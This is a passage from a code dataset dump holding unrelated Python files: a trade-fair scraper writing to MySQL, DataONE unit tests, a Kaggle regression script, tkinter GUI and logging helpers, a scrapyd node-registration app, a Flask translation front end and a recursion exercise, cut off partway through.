event_localization = event_localization[0].text.strip()\r\n event_localization = event_localization.split(\"\\n\")\r\n event_localization = event_localization[1].strip()\r\n event_localization_mysql = (event_localization,)\r\n print(event_localization)\r\n event_www = event_page_soup.select('.col-sm-6 a')\r\n if not event_www:\r\n event_www = None\r\n else:\r\n event_www = event_www[0][\"href\"]\r\n print(event_www)\r\n event_description = event_page_soup.select('.row:nth-child(5) .col-lg-12')\r\n event_description = event_description[0].text\r\n event_description = event_description.split('\\n', 2)[-1].strip()\r\n print(event_description)\r\n event_page_url = event_page_soup.find(\"div\", {\"class\": \"col-lg-8 col-sm-8 col-xs-12\"})\r\n event_page_url = event_page_url.a[\"href\"]\r\n event_page_url_mysql = (event_page_url,)\r\n select_formula = \"SELECT organizer_id FROM \" + basic_table_name_organizers + \" WHERE organizer_page_url = 
%s\"\r\n mycursor.execute(select_formula, event_page_url_mysql)\r\n organizer_id_event = mycursor.fetchone()\r\n organizer_id_event = organizer_id_event[0]\r\n print(organizer_id_event)\r\n select_exists_event_full_name_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_events + \" WHERE event_full_name = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_event_full_name_formula, event_full_name_mysql)\r\n exists_event_full_name_condition = mycursor.fetchone()\r\n exists_event_full_name_condition = exists_event_full_name_condition[0]\r\n print(\"existence condition name: \" + str(exists_event_full_name_condition))\r\n select_exists_event_localization_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_events + \" WHERE event_localization = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_event_localization_formula, event_localization_mysql)\r\n exists_event_localization_condition = mycursor.fetchone()\r\n exists_event_localization_condition = exists_event_localization_condition[0]\r\n print(\"existence condition localization: \" + str(exists_event_localization_condition))\r\n if exists_event_full_name_condition and exists_event_localization_condition:\r\n print(\"EXIST\")\r\n select_existing_event_id_formula = \"SELECT event_id FROM \" + basic_table_name_events + \" WHERE event_full_name = %s\"\r\n mycursor.execute(select_existing_event_id_formula, event_full_name_mysql)\r\n existing_event_id = mycursor.fetchone()\r\n existing_event_id = existing_event_id[0]\r\n sql_data_cat_j_ev = (category_id, existing_event_id)\r\n else:\r\n print(\"NOT EXIST\")\r\n sql_data_events = (event_id, event_full_name, event_logo, event_date, event_localization, event_www, event_description, organizer_id_event)\r\n mycursor.execute(sqlFormula_events, sql_data_events)\r\n sql_data_cat_j_ev = (category_id, event_id)\r\n mycursor.execute(sqlFormula_cat_j_ev, sql_data_cat_j_ev)\r\n if not (exists_event_full_name_condition and exists_event_localization_condition):\r\n event_id = event_id + 1\r\n page_number = page_number + 1\r\nmydb.commit()\r\n","sub_path":"portal_targowy.py","file_name":"portal_targowy.py","file_ext":"py","file_size_in_byte":26233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307012628","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This work was created by participants in the DataONE project, and is\n# jointly copyrighted by participating institutions in DataONE. 
For\n# more information on DataONE, see our web site at http://dataone.org.\n#\n# Copyright 2009-2016 DataONE\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Stdlib\nimport unittest\nimport logging\nimport sys\nimport StringIO\n\n# D1\nfrom d1_common.test_case_with_url_compare import TestCaseWithURLCompare # noqa: E402\n\n# App\nimport d1_client_cli.impl.replication_policy as replication_policy\n\n#===============================================================================\n\n\nclass TestReplicationPolicy(TestCaseWithURLCompare):\n  def setUp(self):\n    pass\n\n  def test_010(self):\n    \"\"\"The replication policy object can be instantiated\"\"\"\n    self.assertNotEquals(None, replication_policy.ReplicationPolicy())\n\n  def test_020(self):\n    \"\"\"After instantiation, get_preferred() returns empty list.\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    self.assertFalse(len(s.get_preferred()))\n\n  def test_022(self):\n    \"\"\"After instantiation, get_blocked() returns empty list.\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    self.assertFalse(len(s.get_blocked()))\n\n  def test_030(self):\n    \"\"\"add_preferred() retains added MN\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_preferred(['preferred_mn_1', 'preferred_mn_2', 'preferred_mn_3'])\n    self.assertEqual(3, len(s.get_preferred()))\n    self.assertTrue('preferred_mn_1' in s.get_preferred())\n    self.assertTrue('preferred_mn_2' in s.get_preferred())\n    self.assertTrue('preferred_mn_3' in s.get_preferred())\n\n  def test_032(self):\n    \"\"\"add_blocked() retains added MN\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_blocked(['blocked_mn_1', 'blocked_mn_2', 'blocked_mn_3'])\n    self.assertEqual(3, len(s.get_blocked()))\n    self.assertTrue('blocked_mn_1' in s.get_blocked())\n    self.assertTrue('blocked_mn_2' in s.get_blocked())\n    self.assertTrue('blocked_mn_3' in s.get_blocked())\n\n  def test_040(self):\n    \"\"\"add_preferred() followed by add_blocked() switches item from preferred to blocked\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_preferred(['preferred_mn'])\n    self.assertFalse('preferred_mn' in s.get_blocked())\n    s.add_blocked(['preferred_mn'])\n    self.assertTrue('preferred_mn' in s.get_blocked())\n\n  def test_045(self):\n    \"\"\"add_blocked() followed by add_preferred() switches item from blocked to preferred\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_blocked(['blocked_mn'])\n    self.assertFalse('blocked_mn' in s.get_preferred())\n    s.add_preferred(['blocked_mn'])\n    self.assertTrue('blocked_mn' in s.get_preferred())\n\n  def test_060(self):\n    \"\"\"Replication is allowed by default.\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    self.assertTrue(s.get_replication_allowed())\n\n  def test_070(self):\n    \"\"\"set_replication_allowed() is retained and can be retrieved with get_replication_allowed()\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.set_replication_allowed(True)\n    self.assertTrue(s.get_replication_allowed())\n    s.set_replication_allowed(False)\n    
self.assertFalse(s.get_replication_allowed())\n\n  def test_080(self):\n    \"\"\"number_of_replicas can be retrieved and is 3 by default\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    self.assertEqual(3, s.get_number_of_replicas()) # 3 by default\n\n  def test_090(self):\n    \"\"\"set_number_of_replicas() is retained and can be retrieved with get_number_of_replicas()\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.set_number_of_replicas(5)\n    self.assertEqual(5, s.get_number_of_replicas())\n    s.set_number_of_replicas(10)\n    self.assertEqual(10, s.get_number_of_replicas())\n\n  def test_100(self):\n    \"\"\"set_replication_allowed(False) implicitly sets number_of_replicas to 0\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.set_number_of_replicas(5)\n    self.assertEqual(5, s.get_number_of_replicas())\n    s.set_replication_allowed(False)\n    self.assertEqual(0, s.get_number_of_replicas())\n\n  def test_110(self):\n    \"\"\"set_number_of_replicas(0) implicitly sets replication_allowed to False\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.set_replication_allowed(True)\n    self.assertTrue(s.get_replication_allowed())\n    s.set_number_of_replicas(0)\n    self.assertFalse(s.get_replication_allowed())\n\n  def test_120(self):\n    \"\"\"print_replication_policy() is available and appears to work\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_preferred(['preferred_mn_1'])\n    s.add_preferred(['preferred_mn_2'])\n    s.add_preferred(['preferred_mn_3'])\n    s.add_blocked(['blocked_mn_1'])\n    s.add_blocked(['blocked_mn_2'])\n    s.add_blocked(['blocked_mn_3'])\n    s.set_number_of_replicas(5)\n    s.set_replication_allowed(True)\n    old = sys.stdout\n    sys.stdout = StringIO.StringIO()\n    # run print\n    s.print_replication_policy()\n    # release stdout\n    out = sys.stdout.getvalue()\n    sys.stdout = old\n    # validate\n    self.assertTrue(len(out) > 100)\n    self.assertTrue('preferred member nodes' in out)\n    self.assertTrue('blocked member nodes' in out)\n\n  def test_130(self):\n    \"\"\"clear() sets everything to default\"\"\"\n    s = replication_policy.ReplicationPolicy()\n    s.add_preferred(['preferred_mn_1'])\n    s.add_preferred(['preferred_mn_2'])\n    s.add_blocked(['blocked_mn_1'])\n    s.add_blocked(['blocked_mn_2'])\n    s.set_number_of_replicas(5)\n    s.set_replication_allowed(True)\n    s.clear()\n    self.assertTrue(not len(s.get_preferred()))\n    self.assertTrue(not len(s.get_blocked()))\n    self.assertTrue(s.get_replication_allowed())\n    self.assertEqual(s.get_number_of_replicas(), 3)\n\n\n#===============================================================================\n\n\ndef log_setup():\n  formatter = logging.Formatter(\n    '%(asctime)s %(levelname)-8s %(message)s', '%y/%m/%d %H:%M:%S'\n  )\n  console_logger = logging.StreamHandler(sys.stdout)\n  console_logger.setFormatter(formatter)\n  logging.getLogger('').addHandler(console_logger)\n\n\ndef main():\n  import optparse\n\n  log_setup()\n\n  # Command line opts.\n  parser = optparse.OptionParser()\n  parser.add_option('--debug', action='store_true', default=False, dest='debug')\n  parser.add_option(\n    '--test', action='store', default='', dest='test', help='run a single test'\n  )\n\n  (options, arguments) = parser.parse_args()\n\n  if options.debug:\n    logging.getLogger('').setLevel(logging.DEBUG)\n  else:\n    logging.getLogger('').setLevel(logging.ERROR)\n\n  s = TestReplicationPolicy\n  s.options = options\n\n  if options.test != '':\n    suite = unittest.TestSuite(map(s, [options.test]))\n  else:\n    suite = unittest.TestLoader().loadTestsFromTestCase(s)\n\n  
unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == '__main__':\n  main()\n","sub_path":"d1_client_cli/src/d1_client_cli/tests/test_replication_policy.py","file_name":"test_replication_policy.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48719198","text":"import numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport matplotlib.pyplot as plt\r\n\r\n#from sklearn.tree import DecisionTreeRegressor\r\n#from sklearn.ensemble import AdaBoostRegressor\r\n#from sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\"\"\"\r\nwith pd.HDFStore(\"C:\\\\Users\\\\4126694\\\\2sig-kaggle\\\\input\\\\train.h5\", \"r\") as train:\r\n    # Note that the \"train\" dataframe is the only dataframe in the file\r\n    df = train.get(\"train\")\r\n    \r\nids = df[\"id\"].unique()\r\nids_in = {}\r\nfor x in ids:\r\n    time = df[df[\"id\"] == x].timestamp\r\n    if time.min() > 100 and time.max() < 1812:\r\n        ids_in[x] = (time.min(), time.max())\r\n\r\ninstrument = 52\r\ndfi = df[df[\"id\"] == instrument]\r\n\r\npd.set_option('mode.chained_assignment',None)\r\ndfi.loc[:,\"cumprod\"] = (1+dfi[\"y\"]).cumprod()\r\n\r\ncols = [x for x in dfi.columns.values if x not in [\"id\", \"timestamp\",\"y\",\"cumprod\"]]\r\nl = len(cols)\r\n\r\ndfj = dfi.fillna(mean_values)\r\ntarget = dfj.pop('y')\r\nts = dfj.pop('timestamp')\r\ndfj = dfi.drop([\"id\",\"y\",\"cumprod\"],axis=1)\r\ndfj=dfj.fillna(0)\r\nfeatures = dfj.values\r\n\"\"\"\r\ndef _load_data(data, n_prev = 61): \r\n    \"\"\"\r\n    data should be pd.DataFrame()\r\n    \"\"\"\r\n\r\n    docX, docY = [], []\r\n    for i in range(len(data)-n_prev):\r\n        docX.append(data.iloc[i:i+n_prev].as_matrix())\r\n        docY.append(data.iloc[i+n_prev].as_matrix())\r\n    alsX = np.array(docX)\r\n    alsY = np.array(docY)\r\n\r\n    return alsX, alsY\r\n\r\n\r\ndef train_test_split(data, test_size=0.5): \r\n    \"\"\"\r\n    This just splits data to training and testing parts\r\n    \"\"\" \r\n    df = pd.DataFrame(data) \r\n    ntrn = round(len(df) * (1 - test_size))\r\n    ntrn = int(ntrn)\r\n    tt = df.iloc[0:ntrn]\r\n    vv = df.iloc[ntrn:]\r\n    \r\n    train = np.array(tt)\r\n    val = np.array(vv)\r\n\r\n\r\n    return (train, val)\r\n\r\n(xtrain, xval) = train_test_split(features)\r\n(ytrain, yval) = train_test_split(target) \r\n(tstrain, tsval) = train_test_split(ts) \r\n\r\n\r\nrng = np.random.RandomState(1)\r\n#regr_1 = DecisionTreeRegressor(max_depth=4)\r\n#regr_2 = AdaBoostRegressor(DecisionTreeRegressor(max_depth=5), n_estimators=500, random_state=rng)\r\n#regr_3 = GradientBoostingRegressor(n_estimators=500, learning_rate=0.1, max_depth=5, random_state=rng, loss='ls')\r\nregr_4 = MultiOutputRegressor(RandomForestRegressor(n_estimators=300, max_depth=10, random_state=0))\r\nregr_5 = RandomForestRegressor(n_estimators=300, max_depth=10, random_state=rng)\r\n\r\n\r\n#regr_1.fit(features, target)\r\n#regr_2.fit(xtrain, ytrain)\r\n#regr_3.fit(xtrain, ytrain)\r\nregr_4.fit(xtrain, ytrain)\r\nregr_5.fit(xtrain, ytrain)\r\n\r\n#y_1 = regr_1.predict(features)\r\n#y_2 = regr_2.predict(xval)\r\n#y_3 = regr_3.predict(xval)\r\ny_4 = regr_4.predict(xval)\r\ny_5 = regr_5.predict(xval)\r\n\r\n\r\n#mse2 = mean_squared_error(yval, y_2)\r\n#mse3 = mean_squared_error(yval, y_3)\r\nmse4 = mean_squared_error(yval, y_4)\r\nmse5 = 
mean_squared_error(yval, y_5)\r\n\r\nprint(\"MSE4: %.6f MSE5: %.6f\" % (mse4,mse5))\r\n\r\nplt.figure()\r\nplt.figure(figsize=(15,10))\r\nplt.plot(ts, target,c=\"k\",label=\"training samples\")\r\nplt.plot(tsval, y_4, c=\"g\", label=\"MultiOutputRF300\", linewidth=2)\r\nplt.plot(tsval, y_5, c=\"r\", label=\"RandomForest300\", linewidth=2)\r\n\r\n","sub_path":"2sigv2.py","file_name":"2sigv2.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373247973","text":"import logging\nimport tkinter as tk\nfrom auxiclean import MAINFORMATTER\n\n\nclass TextHandler(logging.Handler):\n    # This class allows you to log to a Tkinter Text or ScrolledText widget\n    # Adapted from Moshe Kaplan:\n    # https://gist.github.com/moshekaplan/c425f861de7bbf28ef06\n\n    def __init__(self, text):\n        # run the regular Handler __init__\n        super().__init__()\n        # Store a reference to the Text it will log to\n        self.setFormatter(MAINFORMATTER)\n        self.text = text\n\n    def emit(self, record):\n        msg = self.format(record)\n\n        def append():\n            self.text.configure(state='normal')\n            self.text.insert(tk.END, msg + '\\n')\n            self.text.configure(state='disabled')\n            # Autoscroll to the bottom\n            self.text.yview(tk.END)\n        # This is necessary because we can't modify the Text from other threads\n        self.text.after(0, append)\n","sub_path":"auxiclean/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238738808","text":"import os\nfrom multiprocessing import Process\nfrom time import sleep\nfilename = \"./timg.jpeg\"\n# get the size of the file\nsize = os.path.getsize(filename)\n# if the child processes used the parent's file object, their offsets would affect each other\n# f = open(filename, 'rb')\n# copy the first half\n\n\ndef copy1():\n    f = open(filename, 'rb')\n    # sleep(1)\n    n = size // 2\n    fw = open('1.jpeg', 'wb')\n\n    while True:\n        if n < 1024:\n            data = f.read(n)\n            fw.write(data)\n            break\n        data = f.read(1024)\n        fw.write(data)\n        n -= 1024\n\n    f.close()\n    fw.close()\n\n\n# copy the second half\ndef copy2():\n    f = open(filename, 'rb')\n    fw = open('2.jpeg', 'wb')\n    f.seek(size // 2, 0)\n    while True:\n        data = f.read(1024)\n        if not data:\n            break\n        fw.write(data)\n    fw.close()\n    f.close()\n\n\np1 = Process(target=copy1) # args=('timg.jpeg',)\np2 = Process(target=copy2) # args=('timg.jpeg',))\np1.start()\np2.start()\np1.join()\np2.join()\n","sub_path":"aid1807习题总结/process/process4.py","file_name":"process4.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60170294","text":"#!/usr/bin/env python\nimport os\nfrom setuptools import setup\n\nPACKAGE = 'pypi-tools'\nVERSION = '0.0.2'\n\nsetup(\n    name = 'pypi-tools',\n    version = VERSION,\n    description = 'Command line PyPI search tool',\n    author = 'Grigoriy Petukhov',\n    author_email = 'lorien@lorien.name',\n    url = 'http://bitbucket.org/lorien/pypi-tools',\n    py_modules = ['pypi'],\n    scripts = ['pypi'],\n    license = \"BSD\",\n    keywords = \"django application development shortcuts helpers\",\n    classifiers=[\n        'Development Status :: 4 - Beta',\n        'Environment :: Web Environment',\n        'Framework :: Django',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n    
],\n)\n","sub_path":"pypi_install_script/pypi-tools-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540987419","text":"frase = str(input('Enter a sentence: ')).upper()\n\na = frase.count('A')\ne = frase.count('E')\ni = frase.count('I')\no = frase.count('O')\nu = frase.count('U')\n\ntotal_de_vogais = a + e + i + o + u\n\nprint(f'The text contains a total of {total_de_vogais} vowels.')\n\nposicoesA = list()\nposicoesE = list()\nposicoesI = list()\nposicoesO = list()\nposicoesU = list()\n\nfor posicao, vogal in enumerate(frase):\n\n    if vogal == 'A':\n        posicoesA.append(posicao + 1)\n    if vogal == 'E':\n        posicoesE.append(posicao + 1)\n    if vogal == 'I':\n        posicoesI.append(posicao + 1)\n    if vogal == 'O':\n        posicoesO.append(posicao + 1)\n    if vogal == 'U':\n        posicoesU.append(posicao + 1)\n\nif posicoesA == []:\n    print('The vowel \"A\" does not appear in the sentence.')\nelse:\n    print(f'The vowel \"A\" appears at position(s) {posicoesA}.')\nif posicoesE == []:\n    print('The vowel \"E\" does not appear in the sentence.')\nelse:\n    print(f'The vowel \"E\" appears at position(s) {posicoesE}.')\nif posicoesI == []:\n    print('The vowel \"I\" does not appear in the sentence.')\nelse:\n    print(f'The vowel \"I\" appears at position(s) {posicoesI}.')\nif posicoesO == []:\n    print('The vowel \"O\" does not appear in the sentence.')\nelse:\n    print(f'The vowel \"O\" appears at position(s) {posicoesO}.')\nif posicoesU == []:\n    print('The vowel \"U\" does not appear in the sentence.')\nelse:\n    print(f'The vowel \"U\" appears at position(s) {posicoesU}.')","sub_path":"contador_vogais_posicoes.py","file_name":"contador_vogais_posicoes.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652440307","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple\nimport os\nfrom proceseq_16s.utilities import time_it\nfrom proceseq_16s import extract_taxonomy, gui_common\nimport tkinter as tk\nfrom tkinter import ttk\n\n\nclass Extractor(gui_common.VariableAreas):\n    def __init__(self, parent):\n        tk.Frame.__init__(self, parent)\n        self.parent = parent\n\n        self.input_file = gui_common.OpenDialogs(self, label='Input file:')\n        self.input_file.grid(column=0, row=0, sticky='WE')\n\n        self.output_file = gui_common.OpenDialogs(self, label='Output file:',\n                                                  ask_saveas=True)\n        self.output_file.grid(column=0, row=1, sticky='WE')\n\n        input_frame = ttk.Frame(self)\n        input_frame.grid(column=0, row=2, sticky='WE', pady=(5))\n        input_frame.grid_columnconfigure(1, weight=1)\n\n        highes_level_label = ttk.Label(input_frame, text='Highest level used '\n                                       'for taxonomy aggregation (0 - off):',\n                                       font=(None, 12))\n        highes_level_label.grid(column=0, row=0, sticky='W', pady=(0, 10))\n        self.highest_level = tk.IntVar()\n        highes_level_entry = ttk.Entry(input_frame, width=8,\n                                       textvariable=self.highest_level, font=(None, 12))\n        highes_level_entry.grid(column=1, row=0, sticky='E', pady=(0, 10))\n\n        taxonomy_length_label = ttk.Label(input_frame, text='Number of taxonomy levels '\n                                          'used by assigned taxonomy:',\n                                          font=(None, 12))\n        taxonomy_length_label.grid(column=0, row=1, sticky='W', pady=(0, 10))\n        self.taxonomy_length = tk.IntVar()\n        taxonomy_length_entry = ttk.Entry(input_frame, width=8,\n                                          textvariable=self.taxonomy_length,\n                                          font=(None, 12))\n        taxonomy_length_entry.grid(column=1, row=1, sticky='E', pady=(0, 10))\n\n        
self.taxonomy_file = gui_common.OpenDialogs(\n self,\n label='Taxonomy file (no taxonomy file will be used, if it is left empty):')\n\n self.taxonomy_file.grid(column=0, row=3, sticky='WE')\n\n def validate_inputs(self, *args):\n '''Validation of values in relevant input widgets\n\n Returns\n -------\n namedtuple\n Named tuple containing 3 values:\n is_valid (bool): Result if it is valid of not\n message_lines (list): List of lines for error box\n info_lines (list): List of lines for warning box\n '''\n is_valid = True\n message_lines = []\n info_lines = []\n\n ValidationResult = namedtuple('ValidationResult', ['is_valid',\n 'message_lines',\n 'info_lines'])\n\n if not os.path.isfile(self.input_file.text):\n is_valid = is_valid and False\n message_lines.append('Invalid input file!')\n\n if (self.taxonomy_file.text.strip() != '' and\n not os.path.isfile(self.taxonomy_file.text)):\n is_valid = is_valid and False\n message_lines.append('Invalid taxonomy file!')\n\n if self.highest_level.get() > self.taxonomy_length.get():\n message_lines.append('Highest level must not be higher than number of '\n 'taxonomy levels!')\n is_valid = is_valid and False\n\n return ValidationResult(is_valid=is_valid,\n message_lines=message_lines,\n info_lines=info_lines)\n\n def fill_defaults(self, config):\n '''Fill default values from a config file'''\n\n try:\n parameters = config['Extract taxonomy']\n except KeyError:\n parameters = {}\n\n self.highest_level.set(parameters.get('Highest level', ''))\n self.taxonomy_length.set(parameters.get('Number of taxonomy levels', ''))\n\n @time_it\n def run(self, *args):\n '''Run extraction of marked taxonomy data and their count'''\n\n with open(self.input_file.text, 'r') as input_file, \\\n open(self.output_file.text, 'w') as output_file:\n\n if self.taxonomy_file.text.strip() == '':\n taxonomy_file = None\n else:\n taxonomy_file = open(self.taxonomy_file.text.strip(), 'r')\n\n if self.highest_level.get() == 0:\n highest_level = self.taxonomy_length.get()\n else:\n highest_level = self.highest_level.get()\n\n extract_taxonomy.read_line(input_file,\n out_file=output_file,\n taxonomy_file=taxonomy_file,\n highest_level=highest_level,\n taxonomy_length=self.taxonomy_length.get())\n\n if taxonomy_file is not None:\n taxonomy_file.close()\n","sub_path":"proceseq_16s/gui_extract_taxonomy.py","file_name":"gui_extract_taxonomy.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90707762","text":"import multiprocessing\nimport os\n\nfrom twisted.application.service import Application\nfrom twisted.application.internet import TimerService, TCPServer\nfrom twisted.web import server\nfrom twisted.python import log\n\nimport traceback\nimport socket\nimport psutil\nimport redis\nimport requests\nimport json\n\nfrom scrapy.utils.misc import load_object\n\nfrom .interfaces import IEggStorage, IPoller, ISpiderScheduler, IEnvironment\nfrom .eggstorage import FilesystemEggStorage\nfrom .scheduler import SpiderScheduler\nfrom .poller import QueuePoller\nfrom .environ import Environment\n\n\ndef application(config):\n app = Application(\"Scrapyd\")\n http_port = config.getint('http_port', 6800)\n bind_address = config.get('bind_address', '127.0.0.1')\n poll_interval = config.getfloat('poll_interval', 5)\n\n poller = QueuePoller(config)\n eggstorage = FilesystemEggStorage(config)\n scheduler = SpiderScheduler(config)\n environment = Environment(config)\n\n app.setComponent(IPoller, poller)\n 
app.setComponent(IEggStorage, eggstorage)\n app.setComponent(ISpiderScheduler, scheduler)\n app.setComponent(IEnvironment, environment)\n\n laupath = config.get('launcher', 'scrapyd.launcher.Launcher')\n laucls = load_object(laupath)\n launcher = laucls(config, app)\n\n webpath = config.get('webroot', 'scrapyd.website.Root')\n webcls = load_object(webpath)\n\n timer = TimerService(poll_interval, poller.poll)\n webservice = TCPServer(http_port, server.Site(\n webcls(config, app)), interface=bind_address)\n log.msg(format=\"Scrapyd web console available at http://%(bind_address)s:%(http_port)s/\",\n bind_address=bind_address, http_port=http_port)\n\n launcher.setServiceParent(app)\n timer.setServiceParent(app)\n webservice.setServiceParent(app)\n\n host = get_host_ip(config)\n redis_host = config.get('redis_host', 'localhost')\n redis_port = config.get('redis_port', 6379)\n redis_db = config.get('redis_db', 0)\n redis_pool = redis.ConnectionPool(\n host=redis_host,\n port=redis_port,\n db=redis_db\n )\n register_to_redis(config, redis_pool)\n log.msg('Registering scrapyd [{}] to redis {}:{} at db {}'.format(host, redis_host, redis_port, redis_db))\n # log.msg('2018-11-03 10:10 am')\n redis_interval = config.getfloat('redis_interval', 5)\n register_timer = TimerService(\n redis_interval, register_to_redis, config, redis_pool)\n register_timer.setServiceParent(app)\n\n return app\n\n\nfailure_count = 0\n\n\ndef register_to_redis(config, redis_pool):\n global failure_count\n try:\n redis_key = config.get('redis_key', 'scrapyd:nodes')\n host_ip = get_host_ip(config)\n if host_ip is None:\n host_name = socket.gethostname()\n message = '\"host_ip\" is not configured, scrapyd [{}] not registered'.format(\n host_name)\n log.msg(message)\n if config.get('notify', False):\n notify(config, message)\n return\n host_port = config.get('http_port', 6800)\n host = '{}:{}'.format(host_ip, host_port)\n mem_free = int(psutil.virtual_memory().available / 1048576)\n cpu_load = os.getloadavg()[0]\n n_cpu = multiprocessing.cpu_count()\n value = f\"{mem_free}|{cpu_load}|{n_cpu}\"\n\n r = redis.Redis(connection_pool=redis_pool)\n if r.hset(redis_key, host, value):\n log.msg('Scrapyd [{}] registered to redis again.'.format(host))\n failure_count = 0\n except Exception as err:\n failure_count += 1\n log.msg(err)\n message = traceback.format_exc()\n if failure_count < 10:\n notify(config, message)\n\n\ndef get_host_ip(config):\n _ip = None\n try:\n _ip = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith(\"127.\")][:1], [[(s.connect(\n ('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]\n except Exception as err:\n log.msg(err)\n return config.get('host_ip', _ip)\n\n\ndef notify(config, message):\n key = config.get('notify_key', '')\n if key == '':\n return\n url = 'https://hooks.slack.com/services/{}'.format(key)\n headers = {'content-type': 'application/json'}\n payload = {'text': message}\n requests.post(url, data=json.dumps(payload), headers=headers)\n","sub_path":"scrapyd/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5250047","text":"from flask import Flask, render_template, request\nfrom wtforms import Form, TextAreaField, validators\nimport os\nimport numpy as np\nfrom translation import *\nimport sentencepiece as spm\nimport re\nfrom fairseq.models.transformer 
import TransformerModel\n\napp = Flask(__name__)\n\n######## Preparing the translator\n#cur_dir = os.path.dirname(__file__)\nsp = spm.SentencePieceProcessor()\nsp.load(\"models/jsec.ja.model\")\n\nja2en = TransformerModel.from_pretrained(\n 'checkpoints/98subwords/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path='data/bin/98_subwords/'\n)\n\n######## Flask\nclass TextForm(Form):\n source = TextAreaField('', [validators.DataRequired(), validators.length(min=5)])\n\n@app.route('/')\ndef index():\n form = TextForm(request.form)\n #text = translate(form)\n return render_template('textform.html', form=form, target=None)\n\n@app.route('/', methods=['POST'])\ndef results():\n form = TextForm(request.form)\n if request.method == 'POST' and form.validate():\n source = request.form['source']\n target = translate(source)\n \n return render_template('textform.html',\n #source=source,\n form=form,\n target=target)\n \n #return render_template('reviewform.html', form=form)\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"hiroto/chapter10/knock99/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246853746","text":"\"\"\" Lab 04 Optional Questions \"\"\"\n\nfrom lab04 import *\n\n# Q6\ndef flatten(lst):\n \"\"\"Returns a flattened version of lst.\n\n >>> flatten([1, 2, 3]) # normal list\n [1, 2, 3]\n >>> x = [1, [2, 3], 4] # deep list\n >>> flatten(x)\n [1, 2, 3, 4]\n >>> x = [[1, [1, 1]], 1, [1, 1]] # deep list\n >>> flatten(x)\n [1, 1, 1, 1, 1, 1]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Base case: if it's only an empty list left, just return that empty list []\n if not lst:\n return []\n # If the currently selected (the first) element is a nested list, recursive call flatten on that element and the rest\n elif type(lst[0]) == list:\n return flatten(lst[0]) + flatten(lst[1:])\n else:\n return [lst[0]] + flatten(lst[1:])\n\n# Q7\ndef merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> merge([1, 3, 5], [2, 4, 6])\n [1, 2, 3, 4, 5, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # This implementation assumes that there are no same elements and no nested list.\n # Base case: if one of the lists is empty, then just add up both lists\n if not lst1 or not lst2:\n return lst1 + lst2\n # Recursive case 1: If the first element of lst1 is smaller than the first element of 